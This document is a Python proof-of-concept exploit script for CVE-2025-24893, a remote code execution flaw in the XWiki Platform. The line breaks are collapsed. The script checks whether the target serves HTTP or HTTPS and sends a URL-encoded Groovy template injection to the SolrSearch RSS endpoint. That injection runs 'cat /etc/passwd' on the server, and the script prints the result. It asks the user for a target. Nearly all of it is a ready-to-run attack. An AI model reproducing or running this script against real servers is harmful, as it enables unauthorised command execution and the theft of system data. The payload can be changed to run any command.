import requests # Banner def display_banner(): print("="*80) print("Exploit Title: CVE-2025-24893 - XWiki Platform Remote Code Execution") print("Made By Al Baradi Joy") print("="*80) # Function to detect the target protocol (HTTP or HTTPS) def detect_protocol(domain): https_url = f"https://{domain}" http_url = f"http://{domain}" try: response = requests.get(https_url, timeout=5, allow_redirects=True) if response.status_code < 400: print(f"[✔] Target supports HTTPS: {https_url}") return https_url except requests.exceptions.RequestException: print("[!] HTTPS not available, falling back to HTTP.") try: response = requests.get(http_url, timeout=5, allow_redirects=True) if response.status_code < 400: print(f"[✔] Target supports HTTP: {http_url}") return http_url except requests.exceptions.RequestException: print("[✖] Target is unreachable on both HTTP and HTTPS.") exit(1) # Exploit function def exploit(target_url): target_url = detect_protocol(target_url.replace("http://", "").replace("https://", "").strip()) exploit_url = f"{target_url}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d" try: print(f"[+] Sending request to: {exploit_url}") response = requests.get(exploit_url, timeout=10) # Check if the exploit was successful if response.status_code == 200 and "root:" in response.text: print("[✔] Exploit successful! Output received:") print(response.text) else: print(f"[✖] Exploit failed. Status code: {response.status_code}") except requests.exceptions.ConnectionError: print("[✖] Connection failed. Target may be down.") except requests.exceptions.Timeout: print("[✖] Request timed out. Target is slow or unresponsive.") except requests.exceptions.RequestException as e: print(f"[✖] Unexpected error: {e}") # Main execution if __name__ == "__main__": display_banner() target = input("[?] Enter the target URL (without http/https): ").strip() exploit(target)